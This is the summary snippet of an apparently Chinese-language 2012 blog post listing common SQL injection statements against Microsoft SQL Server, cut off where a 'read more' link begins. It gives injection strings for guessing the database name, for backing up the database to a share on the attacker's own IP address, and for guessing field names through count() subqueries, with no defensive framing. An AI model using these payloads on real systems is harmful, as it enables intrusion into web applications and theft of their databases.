摘要: 最简单的一种SQL注入,常见的注入语句还有:1)猜测数据库名,备份数据库a)猜测数据库名:and db_name() >0或系统表master.dbo.sysdatabasesb)备份数据库:;backup database数据库名to disk = ‘c:\*.db’;--或:declare @a sysname;set @a=db_name();backup database @a to disk='你的IP你的共享目录bak.dat' ,name='test';--2)猜解字段名称a)猜解法:and (select count(字段名) from表名 阅读全文
posted @ 2012-11-01 10:23 Rich 申 阅读(268) 评论(0) 推荐(0) 编辑